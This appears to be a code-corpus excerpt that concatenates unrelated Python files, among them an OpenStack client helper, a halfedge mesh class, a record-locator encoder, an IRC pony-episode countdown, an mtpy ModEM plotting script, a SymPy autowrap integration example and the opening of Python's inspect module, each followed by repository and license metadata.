:param version: client version ("1"/"2" etc.)
:returns: Standard python OpenStack client instance
"""
client = getattr(self._clients, client_type)
return client(version) if version is not None else client()
def admin_clients(self, client_type, version=None):
"""Returns a python admin openstack client of the requested type.
:param client_type: Client type ("nova"/"glance" etc.)
:param version: client version ("1"/"2" etc.)
:returns: Python openstack client object
"""
client = getattr(self._admin_clients, client_type)
return client(version) if version is not None else client()
def _init_profiler(self, context):
"""Inits the profiler."""
if not CONF.benchmark.enable_profiler:
return
if context is not None:
cred = None
profiler_hmac_key = None
if context.get("admin"):
cred = context["admin"]["credential"]
if cred.profiler_hmac_key is not None:
profiler_hmac_key = cred.profiler_hmac_key
if context.get("user"):
cred = context["user"]["credential"]
if cred.profiler_hmac_key is not None:
profiler_hmac_key = cred.profiler_hmac_key
if profiler_hmac_key is None:
return
profiler.init(profiler_hmac_key)
trace_id = profiler.get().get_base_id()
self.add_output(complete={
"title": "OSProfiler Trace-ID",
"chart_plugin": "TextArea",
"data": [trace_id]})
| apache-2.0 | -7,827,861,981,665,258,000 | 37.125926 | 78 | 0.584224 | false | 4.433247 | false | false | false |
ccgeom/ccg-notes | src/ccgeom/manifold.py | 1 | 3377 |
import numpy as np
# following the idea of the halfedge data structure from David Gu's lecture
# https://www3.cs.stonybrook.edu/~gu/lectures/lecture_8_halfedge_data_structure.pdf
# and adapting it to a numpy-friendly representation
# * vertexes: the position of each vertex
# * faces: the centroid position of each face
# * edges: the centroid position of each edge
# * halfedges: the vector of each halfedge
# * vertexes2vertexes
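#
# A sketch of the flat, numpy-friendly layout assumed by the code below
# (VTK-style size-prefixed cell array; a triangle face is shown only as an
# illustration):
#
#   cells     = [3, v0, v1, v2,  3, v3, v4, v5, ...]   # vertex ids per face
#   vertexes  : (n_vertexes, 3) positions
#   faces     : (n_faces, 3) face centroids
#   edges     : (n_edges, 3) edge midpoints
#   halfedges : (2 * n_edges, 3) halfedge vectors, two opposite ones per edge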
class Manifold:
def __init__(self, vtk_mesh=None):
if vtk_mesh != None:
self.mesh = vtk_mesh # a VTK mesh structure
self.n_vertexes = vtk_mesh.n_points
self.n_faces = vtk_mesh.n_cells
cells = np.array(self.mesh.cells).copy()
self.vertexes = np.array(self.mesh.points).copy()
self.faces, cells_begin, cells_end = make_dual(self.n_faces, self.vertexes, cells)
self.edges, self.halfedges = make_edges(self.n_faces, self.vertexes, cells, cells_begin, cells_end)
self.n_edges = self.edges.shape[0]
self.n_halfedges = self.halfedges.shape[0]
self.adjacency_vertexes = None
self.adjacency_faces = None
self.adjacency_edges = None
self.adjacency_halfedges = None
self.adjacency_vertexes2faces = None
self.adjacency_vertexes2edges = None
self.adjacency_vertexes2halfedges = None
self.adjacency_faces2vertexes = None
self.adjacency_faces2edges = None
self.adjacency_faces2halfedges = None
self.adjacency_edges2vertexes = None
self.adjacency_edges2faces = None
self.adjacency_edges2halfedges = None
self.adjacency_halfedges2vertexes = None
self.adjacency_halfedges2faces = None
self.adjacency_halfedges2edges = None
self.orientation = None
def __getstate__(self):
state = self.__dict__.copy()
del state["mesh"]
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.mesh = None
def make_dual(n_faces, points, faces):
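    """Return the centroid of every face together with, for each face, the
    indices where its vertex ids begin and end inside the flat cell array."""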
ix, cur = 0, 0
centroid = []
faces_begin = []
faces_end = []
while ix < n_faces:
sz = faces[cur]
assert sz > 2
        ps = points[faces[cur + 1:cur + sz + 1]]
        assert ps.shape[0] == sz
centroid.append(np.mean(ps, axis=0))
faces_begin.append(cur + 1)
faces_end.append(cur + sz)
cur = cur + sz + 1
ix += 1
assert cur == faces.shape[0]
return np.array(centroid), np.array(faces_begin), np.array(faces_end)
def make_edges(n_faces, vertexes, cells, cells_begin, cells_end):
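    """Build the midpoint of every edge and, for every edge, the two opposite
    halfedge vectors, walking each face loop once."""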
total = 0
for ix in range(n_faces):
begin, end = cells_begin[ix], cells_end[ix]
sz = end - begin + 1
total += sz
cur = 0
    edges = np.zeros([total, 3], dtype=np.float64)
    halfedges = np.zeros([2 * total, 3], dtype=np.float64)
for ix in range(n_faces):
begin, end = cells_begin[ix], cells_end[ix]
sz = end - begin + 1
        pxs = vertexes[cells[begin:end + 1]]
for p in range(sz):
src, tgt = pxs[p - 1], pxs[p]
edges[cur] = (src + tgt) / 2
halfedges[2 * cur] = tgt - src
halfedges[2 * cur + 1] = src - tgt
cur += 1
return edges, halfedges | cc0-1.0 | 9,013,381,987,743,515,000 | 32.117647 | 111 | 0.588688 | false | 3.584926 | false | false | false |
bmi-forum/bmi-pyre | pythia-0.8/packages/pyre/pyre/idd/RecordLocator.py | 2 | 2248 | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from pyre.components.Component import Component
class RecordLocator(Component):
class Inventory(Component.Inventory):
import pyre.inventory
alphabet = pyre.inventory.str('alphabet', default="23456789ABCDEFGHIJKLMNPQRSTUVWXYZ")
def decode(self, locator):
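        """Map a locator back to an integer in the configured alphabet and
        split the resulting digit string before its last four digits."""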
locator = locator.upper()
locator = list(locator)
locator.reverse()
tid = 0
for index, letter in enumerate(locator):
tid += self._hashtable[letter] * self._base**index
label = str(tid)
return label[:-4], label[-4:]
def encode(self, transactionId, date=None):
if date is None:
import time
tick = time.localtime()
date = time.strftime("%y%m%d", tick)
bcd = int(str(transactionId) + date)
locator = self._encode(bcd)
return locator
def __init__(self):
Component.__init__(self, "locator", facility="recordLocator")
self._alphabet = None
self._base = None
self._hashtable = None
return
def _init(self):
Component._init(self)
self._alphabet = list(self.inventory.alphabet)
self._base = len(self._alphabet)
self._hashtable = self._hash(self._alphabet)
return
def _encode(self, bcd):
label = []
while 1:
bcd, remainder = divmod(bcd, self._base)
label.append(self._alphabet[remainder])
if bcd == 0:
break
label.reverse()
label = "".join(label)
return label
def _hash(self, alphabet):
hash = {}
for index, letter in enumerate(alphabet):
hash[letter] = index
return hash
# version
__id__ = "$Id: RecordLocator.py,v 1.3 2005/04/28 03:37:16 pyre Exp $"
# End of file
| gpl-2.0 | 4,583,188,842,701,710,300 | 21.039216 | 94 | 0.501335 | false | 4.331407 | false | false | false |
andimiller/twistedbot | modules/ponycountdown.py | 5 | 1786 | from datetime import datetime
def nextponies():
times = [
(datetime(2011, 11, 12, 15),2,6,"The Cutie Pox"),
(datetime(2011, 11, 19, 15),2,7,"May the Best Pet Win!"),
(datetime(2011, 11, 26, 15),2,8,"The Mysterious mare do Well"),
(datetime(2011, 12, 3, 15),2,9,"Sweet and Elite"),
(datetime(2011, 12, 10, 15),2,10,"Secret of My Excess"),
(datetime(2011, 12, 17, 15),2,11,"Hearth's Warming Eve"),
(datetime(2012, 1, 7, 15),2,12,"Family Appreciation Day"),
(datetime(2012, 1, 14, 15),2,13,"Baby Cakes"),
(datetime(2012, 1, 21, 15),2,14,"The last Roundup"),
(datetime(2012, 1, 28, 15),2,15,"The Super Speedy Cider Squeezy 6000"),
(datetime(2012, 2, 4, 15),2,16,"Read It and Weep"),
(datetime(2012, 11, 10, 15),3,1,"The Crystal Empire, Part 1"),
(datetime(2012, 11, 10, 16),3,2,"The Crystal Empire, Part 2"),
(datetime(2012, 11, 17, 15),3,3,"Too Many Pinkie Pies"),
(datetime(2012, 11, 24, 15),3,4,"One Bad Apple"),
(datetime(2012, 12, 3, 15),3,5,"Magic Duel"),
(datetime(2012, 12, 10, 15),3,6,"Sleepless in Ponyville"),
(datetime(2012, 12, 17, 15),3,7,"Wonderbolt Academy"),
(datetime(2012, 12, 24, 15),3,8,"Apple Family Reunion")
]
    r = map(lambda x: (x[0] - datetime.now(), x[1], x[2], x[3]), times)
    r = sorted(r)
    for x in r:
        if x[0].days >= 0:
            return "%s until Series %d episode %d - %s!" % (str(x[0]).split(".")[0], x[1], x[2], x[3])
return "OutOfPoniesException: no ponies found in the future."
def ponies(tbot, user, channel, msg):
tbot.msg(channel,nextponies())
ponies.rule = "^!ponies$"
| mit | 3,177,056,112,800,926,000 | 50.028571 | 102 | 0.537514 | false | 2.862179 | false | false | false |
MTgeophysics/mtpy | examples/cmdline/visualize_modem_models.py | 1 | 4816 | # -*- coding: utf-8 -*-
"""
Plot PTMap|RMSMap|Response|DepthSlice from Inversion Model Results
Created on Tue Oct 04 13:13:29 2016
@author: [email protected]
@author: [email protected]
Test Run:
python examples/scripts/visualize_modem_models.py ./examples/data/ModEM_files/VicSynthetic07
"""
import os
import sys
#from mtpy.imaging.modem_phase_tensor_maps import PlotPTMaps
from mtpy.modeling.modem.phase_tensor_maps import PlotPTMaps
from mtpy.imaging.plot_depth_slice import PlotDepthSlice
#from legacy.plot_response import PlotResponse
#from legacy.plot_rms_map import PlotRMSMaps
from mtpy.modeling.modem.plot_response import PlotResponse
from mtpy.modeling.modem import PlotRMSMaps
# original test case:
# datfn='ModEM_Data_noise10inv.dat' # what is this noiseinv.dat?
# NLCG_datfn='Modular_MPI_NLCG_019.dat'
# resfn='Modular_MPI_NLCG_019.res'
# rhofn='Modular_MPI_NLCG_019.rho'
# FZ: below works fine
# datfn='Isa_run3_NLCG_049.dat' #'ModEM_Data_noise10inv.dat'
# NLCG_datfn='Isa_run3_NLCG_049.dat'
# resfn='Isa_run3_NLCG_049.res'
# rhofn='Isa_run3_NLCG_049.rho'
# rename/copy the final MODEM results to these file names:
datfn='NLCG.dat' # 'ModEM_Data_noise10inv.dat'
NLCG_datfn='NLCG.dat'
resfn='NLCG.res'
rhofn='NLCG.rho'
def plot_model(data_dir, plot_type='PTMap', depth_index=20, periodin=0):
"""
plot model of the plot_type
:param data_dir: directory where modem's NLCG.dat .rho .res files are located
:param plot_type: one of these 4: PTMap|RMSMap|Response|DepthSlice
    :param depth_index: index of the depth slice to plot (used by DepthSlice)
    :param periodin: index of the period to plot (used by PTMap)
:return:
"""
wd=data_dir
plot_type=plot_type
depth_index = depth_index # depth index
# plot phase tensor map with residuals:
# this will NOT work, an empty figure.
# plt.savefig(op.join(wd,'ptmaps.png'),dpi=300,ellipse_size=40)
if plot_type == 'PTMap':
ptmObj=PlotPTMaps(data_fn=os.path.join(wd, datfn),
resp_fn=os.path.join(wd, NLCG_datfn),
ellipse_size=30)
outfn=os.path.join(wd, 'ptmaps.png')
ptmObj.plot(period=periodin, save2file=outfn)
# plot map of RMS values
# python examples/modem_plotmodel2.py
# examples/data/ModEM_files/VicSynthetic07 RMSMap
if plot_type == 'RMSMap':
resfile=os.path.join(wd, resfn)
prmsObj=PlotRMSMaps(
residual_fn=resfile,
xminorticks=50000,
yminorticks=50000)
# ,depth_index=di, save_plots='y') # these are not in func args
# prmsObj.plot_loop(fig_format="png" ) #plot all periods and save
# figure
# plot responses at a station
if plot_type == 'Response':
outfn = os.path.join(wd, 'response.png')
pltObj=PlotResponse(data_fn=os.path.join(wd, datfn),plot_type=['16-L03S01','VIC001'])
#FZ: need to refactor plot_type= list of station names
pltObj.plot()
# plot depth slice
if plot_type == 'DepthSlice':
print("plot type is", plot_type)
modrho=os.path.join(wd, rhofn)
print(modrho)
# pltObj= PlotDepthSlice(model_fn=modrho, xminorticks=100000, yminorticks=100000, depth_index=di, save_plots='y')
pltObj=PlotDepthSlice(
model_fn=modrho,
save_plots='y',
depth_index=depth_index)
pltObj.plot(ind=depth_index)
return
#########################################################################
# plot_type=[ PTMap RMSMap Response DepthSlice ]
# How2Run:
# python examples/cmdline/visualize_modem_models.py ./examples/data/ModEM_files/VicSynthetic07 PTMap pindex
#
# python examples/cmdline/visualize_modem_models.py ./examples/data/ModEM_files/VicSynthetic07
# ---------------------------------------
if __name__ == '__main__':
if len(sys.argv) <= 2:
print("USAGE example:")
print(
"python %s examples/data/ModEM_files/VicSynthetic07 [PTMap|RMSMap|Response|DepthSlice]" %
(sys.argv[0]))
for plot_type in ['PTMap', 'RMSMap', 'Response', 'DepthSlice']:
plot_model(sys.argv[1], plot_type=plot_type)
elif len(sys.argv) == 3:
data_dir=sys.argv[1]
plot_type=sys.argv[2]
if (plot_type not in ['PTMap', 'RMSMap', 'Response', 'DepthSlice']):
print("Input Parameter plot type must be in:", [
'PTMap', 'RMSMap', 'Response', 'DepthSlice'])
plot_model(data_dir, plot_type=plot_type)
else:
data_dir=sys.argv[1]
plot_type=sys.argv[2]
period_index=int(sys.argv[3])
if (plot_type not in ['PTMap', 'RMSMap', 'Response', 'DepthSlice']):
print("Input Parameter plot type must be in:", [
'PTMap', 'RMSMap', 'Response', 'DepthSlice'])
plot_model(data_dir, plot_type=plot_type, periodin=period_index)
| gpl-3.0 | -8,616,802,495,226,071,000 | 32.915493 | 121 | 0.633929 | false | 3.081254 | false | false | false |
beni55/sympy | examples/advanced/autowrap_integrators.py | 20 | 9070 | #!/usr/bin/env python
"""
Numerical integration with autowrap
-----------------------------------
This example demonstrates how you can use the autowrap module in SymPy
to create fast, numerical integration routines callable from python. See
in the code for detailed explanations of the various steps. An
autowrapped sympy expression can be significantly faster than what you
would get by applying a sequence of the ufuncs shipped with numpy. [0]
We will find the coefficients needed to approximate a quantum mechanical
Hydrogen wave function in terms of harmonic oscillator solutions. For
the sake of demonstration, this will be done by setting up a simple
numerical integration scheme as a SymPy expression, and obtain a binary
implementation with autowrap.
You need to have numpy installed to run this example, as well as a
working fortran compiler. If you have pylab installed, you will be
rewarded with a nice plot in the end.
[0]:
http://ojensen.wordpress.com/2010/08/10/fast-ufunc-ish-hydrogen-solutions/
----
"""
import sys
from sympy.external import import_module
np = import_module('numpy')
if not np:
sys.exit("Cannot import numpy. Exiting.")
pylab = import_module('pylab', warn_not_installed=True)
from sympy.utilities.lambdify import implemented_function
from sympy.utilities.autowrap import autowrap, ufuncify
from sympy import Idx, IndexedBase, Lambda, pprint, Symbol, oo, Integral,\
Function
from sympy.physics.sho import R_nl
from sympy.physics.hydrogen import R_nl as hydro_nl
# ***************************************************************************
# calculation parameters to play with
# ***************************************************************************
basis_dimension = 5 # Size of h.o. basis (n < basis_dimension)
omega2 = 0.1 # in atomic units: twice the oscillator frequency
orbital_momentum_l = 1 # the quantum number `l` for angular momentum
hydrogen_n = 2 # the nodal quantum number for the Hydrogen wave
rmax = 20 # cut off in the radial direction
gridsize = 200 # number of points in the grid
# ***************************************************************************
def main():
print(__doc__)
# arrays are represented with IndexedBase, indices with Idx
m = Symbol('m', integer=True)
i = Idx('i', m)
A = IndexedBase('A')
B = IndexedBase('B')
x = Symbol('x')
print("Compiling ufuncs for radial harmonic oscillator solutions")
# setup a basis of ho-solutions (for l=0)
basis_ho = {}
for n in range(basis_dimension):
# Setup the radial ho solution for this n
expr = R_nl(n, orbital_momentum_l, omega2, x)
# Reduce the number of operations in the expression by eval to float
expr = expr.evalf(15)
print("The h.o. wave function with l = %i and n = %i is" % (
orbital_momentum_l, n))
pprint(expr)
# implement, compile and wrap it as a ufunc
basis_ho[n] = ufuncify(x, expr)
# now let's see if we can express a hydrogen radial wave in terms of
# the ho basis. Here's the solution we will approximate:
H_ufunc = ufuncify(x, hydro_nl(hydrogen_n, orbital_momentum_l, 1, x))
# The transformation to a different basis can be written like this,
#
# psi(r) = sum_i c(i) phi_i(r)
#
# where psi(r) is the hydrogen solution, phi_i(r) are the H.O. solutions
# and c(i) are scalar coefficients.
#
# So in order to express a hydrogen solution in terms of the H.O. basis, we
# need to determine the coefficients c(i). In position space, it means
# that we need to evaluate an integral:
#
# psi(r) = sum_i Integral(R**2*conj(phi(R))*psi(R), (R, 0, oo)) phi_i(r)
#
# To calculate the integral with autowrap, we notice that it contains an
# element-wise sum over all vectors. Using the Indexed class, it is
# possible to generate autowrapped functions that perform summations in
# the low-level code. (In fact, summations are very easy to create, and as
# we will see it is often necessary to take extra steps in order to avoid
# them.)
# we need one integration ufunc for each wave function in the h.o. basis
binary_integrator = {}
for n in range(basis_dimension):
#
# setup basis wave functions
#
# To get inline expressions in the low level code, we attach the
# wave function expressions to a regular SymPy function using the
# implemented_function utility. This is an extra step needed to avoid
        # erroneous summations in the wave function expressions.
#
# Such function objects carry around the expression they represent,
# but the expression is not exposed unless explicit measures are taken.
# The benefit is that the routines that searches for repeated indices
# in order to make contractions will not search through the wave
# function expression.
psi_ho = implemented_function('psi_ho',
Lambda(x, R_nl(n, orbital_momentum_l, omega2, x)))
# We represent the hydrogen function by an array which will be an input
# argument to the binary routine. This will let the integrators find
# h.o. basis coefficients for any wave function we throw at them.
psi = IndexedBase('psi')
#
# setup expression for the integration
#
step = Symbol('step') # use symbolic stepsize for flexibility
# let i represent an index of the grid array, and let A represent the
# grid array. Then we can approximate the integral by a sum over the
# following expression (simplified rectangular rule, ignoring end point
# corrections):
expr = A[i]**2*psi_ho(A[i])*psi[i]*step
if n == 0:
print("Setting up binary integrators for the integral:")
pprint(Integral(x**2*psi_ho(x)*Function('psi')(x), (x, 0, oo)))
# But it needs to be an operation on indexed objects, so that the code
# generators will recognize it correctly as an array.
# expr = expr.subs(x, A[i])
# Autowrap it. For functions that take more than one argument, it is
# a good idea to use the 'args' keyword so that you know the signature
# of the wrapped function. (The dimension m will be an optional
# argument, but it must be present in the args list.)
binary_integrator[n] = autowrap(expr, args=[A.label, psi.label, step, m])
# Lets see how it converges with the grid dimension
print("Checking convergence of integrator for n = %i" % n)
for g in range(3, 8):
grid, step = np.linspace(0, rmax, 2**g, retstep=True)
print("grid dimension %5i, integral = %e" % (2**g,
binary_integrator[n](grid, H_ufunc(grid), step)))
print("A binary integrator has been set up for each basis state")
print("We will now use them to reconstruct a hydrogen solution.")
# Note: We didn't need to specify grid or use gridsize before now
grid, stepsize = np.linspace(0, rmax, gridsize, retstep=True)
print("Calculating coefficients with gridsize = %i and stepsize %f" % (
len(grid), stepsize))
coeffs = {}
for n in range(basis_dimension):
coeffs[n] = binary_integrator[n](grid, H_ufunc(grid), stepsize)
print("c(%i) = %e" % (n, coeffs[n]))
print("Constructing the approximate hydrogen wave")
hydro_approx = 0
all_steps = {}
for n in range(basis_dimension):
hydro_approx += basis_ho[n](grid)*coeffs[n]
all_steps[n] = hydro_approx.copy()
if pylab:
line = pylab.plot(grid, all_steps[n], ':', label='max n = %i' % n)
# check error numerically
diff = np.max(np.abs(hydro_approx - H_ufunc(grid)))
print("Error estimate: the element with largest deviation misses by %f" % diff)
if diff > 0.01:
print("This is much, try to increase the basis size or adjust omega")
else:
print("Ah, that's a pretty good approximation!")
# Check visually
if pylab:
print("Here's a plot showing the contribution for each n")
line[0].set_linestyle('-')
pylab.plot(grid, H_ufunc(grid), 'r-', label='exact')
pylab.legend()
pylab.show()
print("""Note:
These binary integrators were specialized to find coefficients for a
harmonic oscillator basis, but they can process any wave function as long
as it is available as a vector and defined on a grid with equidistant
points. That is, on any grid you get from numpy.linspace.
To make the integrators even more flexible, you can setup the harmonic
oscillator solutions with symbolic parameters omega and l. Then the
autowrapped binary routine will take these scalar variables as arguments,
so that the integrators can find coefficients for *any* isotropic harmonic
oscillator basis.
""")
if __name__ == '__main__':
main()
| bsd-3-clause | -3,957,990,686,785,907,000 | 39.311111 | 83 | 0.642889 | false | 3.899398 | false | false | false |
2014c2g2/2014c2 | wsgi/static/Brython2.1.0-20140419-113919/Lib/inspect.py | 91 | 78882 | """Get useful information from live Python objects.
This module encapsulates the interface provided by the internal special
attributes (co_*, im_*, tb_*, etc.) in a friendlier fashion.
It also provides some help for examining source code and class layout.
Here are some of the useful functions provided by this module:
ismodule(), isclass(), ismethod(), isfunction(), isgeneratorfunction(),
isgenerator(), istraceback(), isframe(), iscode(), isbuiltin(),
isroutine() - check object types
getmembers() - get members of an object that satisfy a given condition
getfile(), getsourcefile(), getsource() - find an object's source code
getdoc(), getcomments() - get documentation on an object
getmodule() - determine the module that an object came from
getclasstree() - arrange classes so as to represent their hierarchy
getargspec(), getargvalues(), getcallargs() - get info about function arguments
getfullargspec() - same, with support for Python-3000 features
formatargspec(), formatargvalues() - format an argument spec
getouterframes(), getinnerframes() - get info about frames
currentframe() - get the current stack frame
stack(), trace() - get info about frames on the stack or in a traceback
signature() - get a Signature object for the callable
"""
# This module is in the public domain. No warranties.
__author__ = ('Ka-Ping Yee <[email protected]>',
'Yury Selivanov <[email protected]>')
import imp
import importlib.machinery
import itertools
import linecache
import os
import re
import sys
import tokenize
import types
import warnings
import functools
import builtins
from operator import attrgetter
from collections import namedtuple, OrderedDict
# Create constants for the compiler flags in Include/code.h
# We try to get them from dis to avoid duplication, but fall
# back to hardcoding so the dependency is optional
try:
from dis import COMPILER_FLAG_NAMES as _flag_names
except ImportError:
CO_OPTIMIZED, CO_NEWLOCALS = 0x1, 0x2
CO_VARARGS, CO_VARKEYWORDS = 0x4, 0x8
CO_NESTED, CO_GENERATOR, CO_NOFREE = 0x10, 0x20, 0x40
else:
mod_dict = globals()
for k, v in _flag_names.items():
mod_dict["CO_" + v] = k
# See Include/object.h
TPFLAGS_IS_ABSTRACT = 1 << 20
# ----------------------------------------------------------- type-checking
def ismodule(object):
"""Return true if the object is a module.
Module objects provide these attributes:
__cached__ pathname to byte compiled file
__doc__ documentation string
__file__ filename (missing for built-in modules)"""
return isinstance(object, types.ModuleType)
def isclass(object):
"""Return true if the object is a class.
Class objects provide these attributes:
__doc__ documentation string
__module__ name of module in which this class was defined"""
return isinstance(object, type)
def ismethod(object):
"""Return true if the object is an instance method.
Instance method objects provide these attributes:
__doc__ documentation string
__name__ name with which this method was defined
__func__ function object containing implementation of method
__self__ instance to which this method is bound"""
return isinstance(object, types.MethodType)
def ismethoddescriptor(object):
"""Return true if the object is a method descriptor.
But not if ismethod() or isclass() or isfunction() are true.
This is new in Python 2.2, and, for example, is true of int.__add__.
An object passing this test has a __get__ attribute but not a __set__
attribute, but beyond that the set of attributes varies. __name__ is
usually sensible, and __doc__ often is.
Methods implemented via descriptors that also pass one of the other
tests return false from the ismethoddescriptor() test, simply because
the other tests promise more -- you can, e.g., count on having the
__func__ attribute (etc) when an object passes ismethod()."""
if isclass(object) or ismethod(object) or isfunction(object):
# mutual exclusion
return False
tp = type(object)
return hasattr(tp, "__get__") and not hasattr(tp, "__set__")
def isdatadescriptor(object):
"""Return true if the object is a data descriptor.
Data descriptors have both a __get__ and a __set__ attribute. Examples are
properties (defined in Python) and getsets and members (defined in C).
Typically, data descriptors will also have __name__ and __doc__ attributes
(properties, getsets, and members have both of these attributes), but this
is not guaranteed."""
if isclass(object) or ismethod(object) or isfunction(object):
# mutual exclusion
return False
tp = type(object)
return hasattr(tp, "__set__") and hasattr(tp, "__get__")
if hasattr(types, 'MemberDescriptorType'):
# CPython and equivalent
def ismemberdescriptor(object):
"""Return true if the object is a member descriptor.
Member descriptors are specialized descriptors defined in extension
modules."""
return isinstance(object, types.MemberDescriptorType)
else:
# Other implementations
def ismemberdescriptor(object):
"""Return true if the object is a member descriptor.
Member descriptors are specialized descriptors defined in extension
modules."""
return False
if hasattr(types, 'GetSetDescriptorType'):
# CPython and equivalent
def isgetsetdescriptor(object):
"""Return true if the object is a getset descriptor.
getset descriptors are specialized descriptors defined in extension
modules."""
return isinstance(object, types.GetSetDescriptorType)
else:
# Other implementations
def isgetsetdescriptor(object):
"""Return true if the object is a getset descriptor.
getset descriptors are specialized descriptors defined in extension
modules."""
return False
def isfunction(object):
"""Return true if the object is a user-defined function.
Function objects provide these attributes:
__doc__ documentation string
__name__ name with which this function was defined
__code__ code object containing compiled function bytecode
__defaults__ tuple of any default values for arguments
__globals__ global namespace in which this function was defined
__annotations__ dict of parameter annotations
__kwdefaults__ dict of keyword only parameters with defaults"""
return isinstance(object, types.FunctionType)
def isgeneratorfunction(object):
"""Return true if the object is a user-defined generator function.
Generator function objects provides same attributes as functions.
See help(isfunction) for attributes listing."""
return bool((isfunction(object) or ismethod(object)) and
object.__code__.co_flags & CO_GENERATOR)
def isgenerator(object):
"""Return true if the object is a generator.
Generator objects provide these attributes:
__iter__ defined to support iteration over container
close raises a new GeneratorExit exception inside the
generator to terminate the iteration
gi_code code object
gi_frame frame object or possibly None once the generator has
been exhausted
gi_running set to 1 when generator is executing, 0 otherwise
next return the next item from the container
send resumes the generator and "sends" a value that becomes
the result of the current yield-expression
throw used to raise an exception inside the generator"""
return isinstance(object, types.GeneratorType)
def istraceback(object):
"""Return true if the object is a traceback.
Traceback objects provide these attributes:
tb_frame frame object at this level
tb_lasti index of last attempted instruction in bytecode
tb_lineno current line number in Python source code
tb_next next inner traceback object (called by this level)"""
return isinstance(object, types.TracebackType)
def isframe(object):
"""Return true if the object is a frame object.
Frame objects provide these attributes:
f_back next outer frame object (this frame's caller)
f_builtins built-in namespace seen by this frame
f_code code object being executed in this frame
f_globals global namespace seen by this frame
f_lasti index of last attempted instruction in bytecode
f_lineno current line number in Python source code
f_locals local namespace seen by this frame
f_trace tracing function for this frame, or None"""
return isinstance(object, types.FrameType)
def iscode(object):
"""Return true if the object is a code object.
Code objects provide these attributes:
co_argcount number of arguments (not including * or ** args)
co_code string of raw compiled bytecode
co_consts tuple of constants used in the bytecode
co_filename name of file in which this code object was created
co_firstlineno number of first line in Python source code
co_flags bitmap: 1=optimized | 2=newlocals | 4=*arg | 8=**arg
co_lnotab encoded mapping of line numbers to bytecode indices
co_name name with which this code object was defined
co_names tuple of names of local variables
co_nlocals number of local variables
co_stacksize virtual machine stack space required
co_varnames tuple of names of arguments and local variables"""
return isinstance(object, types.CodeType)
def isbuiltin(object):
"""Return true if the object is a built-in function or method.
Built-in functions and methods provide these attributes:
__doc__ documentation string
__name__ original name of this function or method
__self__ instance to which a method is bound, or None"""
return isinstance(object, types.BuiltinFunctionType)
def isroutine(object):
"""Return true if the object is any kind of function or method."""
return (isbuiltin(object)
or isfunction(object)
or ismethod(object)
or ismethoddescriptor(object))
def isabstract(object):
"""Return true if the object is an abstract base class (ABC)."""
return bool(isinstance(object, type) and object.__flags__ & TPFLAGS_IS_ABSTRACT)
def getmembers(object, predicate=None):
"""Return all members of an object as (name, value) pairs sorted by name.
Optionally, only return members that satisfy a given predicate."""
if isclass(object):
mro = (object,) + getmro(object)
else:
mro = ()
results = []
for key in dir(object):
# First try to get the value via __dict__. Some descriptors don't
# like calling their __get__ (see bug #1785).
for base in mro:
if key in base.__dict__:
value = base.__dict__[key]
break
else:
try:
value = getattr(object, key)
except AttributeError:
continue
if not predicate or predicate(value):
results.append((key, value))
results.sort()
return results
Attribute = namedtuple('Attribute', 'name kind defining_class object')
def classify_class_attrs(cls):
"""Return list of attribute-descriptor tuples.
For each name in dir(cls), the return list contains a 4-tuple
with these elements:
0. The name (a string).
1. The kind of attribute this is, one of these strings:
'class method' created via classmethod()
'static method' created via staticmethod()
'property' created via property()
'method' any other flavor of method
'data' not a method
2. The class which defined this attribute (a class).
3. The object as obtained directly from the defining class's
__dict__, not via getattr. This is especially important for
data attributes: C.data is just a data object, but
C.__dict__['data'] may be a data descriptor with additional
info, like a __doc__ string.
"""
mro = getmro(cls)
names = dir(cls)
result = []
for name in names:
# Get the object associated with the name, and where it was defined.
# Getting an obj from the __dict__ sometimes reveals more than
# using getattr. Static and class methods are dramatic examples.
# Furthermore, some objects may raise an Exception when fetched with
# getattr(). This is the case with some descriptors (bug #1785).
# Thus, we only use getattr() as a last resort.
homecls = None
for base in (cls,) + mro:
if name in base.__dict__:
obj = base.__dict__[name]
homecls = base
break
else:
obj = getattr(cls, name)
homecls = getattr(obj, "__objclass__", homecls)
# Classify the object.
if isinstance(obj, staticmethod):
kind = "static method"
elif isinstance(obj, classmethod):
kind = "class method"
elif isinstance(obj, property):
kind = "property"
elif ismethoddescriptor(obj):
kind = "method"
elif isdatadescriptor(obj):
kind = "data"
else:
obj_via_getattr = getattr(cls, name)
if (isfunction(obj_via_getattr) or
ismethoddescriptor(obj_via_getattr)):
kind = "method"
else:
kind = "data"
obj = obj_via_getattr
result.append(Attribute(name, kind, homecls, obj))
return result
# ----------------------------------------------------------- class helpers
def getmro(cls):
"Return tuple of base classes (including cls) in method resolution order."
return cls.__mro__
# -------------------------------------------------- source code extraction
def indentsize(line):
"""Return the indent size, in spaces, at the start of a line of text."""
expline = line.expandtabs()
return len(expline) - len(expline.lstrip())
def getdoc(object):
"""Get the documentation string for an object.
All tabs are expanded to spaces. To clean up docstrings that are
indented to line up with blocks of code, any whitespace than can be
uniformly removed from the second line onwards is removed."""
try:
doc = object.__doc__
except AttributeError:
return None
if not isinstance(doc, str):
return None
return cleandoc(doc)
def cleandoc(doc):
"""Clean up indentation from docstrings.
Any whitespace that can be uniformly removed from the second line
onwards is removed."""
try:
lines = doc.expandtabs().split('\n')
except UnicodeError:
return None
else:
# Find minimum indentation of any non-blank lines after first line.
margin = sys.maxsize
for line in lines[1:]:
content = len(line.lstrip())
if content:
indent = len(line) - content
margin = min(margin, indent)
# Remove indentation.
if lines:
lines[0] = lines[0].lstrip()
if margin < sys.maxsize:
for i in range(1, len(lines)): lines[i] = lines[i][margin:]
# Remove any trailing or leading blank lines.
while lines and not lines[-1]:
lines.pop()
while lines and not lines[0]:
lines.pop(0)
return '\n'.join(lines)
def getfile(object):
"""Work out which source or compiled file an object was defined in."""
if ismodule(object):
if hasattr(object, '__file__'):
return object.__file__
raise TypeError('{!r} is a built-in module'.format(object))
if isclass(object):
object = sys.modules.get(object.__module__)
if hasattr(object, '__file__'):
return object.__file__
raise TypeError('{!r} is a built-in class'.format(object))
if ismethod(object):
object = object.__func__
if isfunction(object):
object = object.__code__
if istraceback(object):
object = object.tb_frame
if isframe(object):
object = object.f_code
if iscode(object):
return object.co_filename
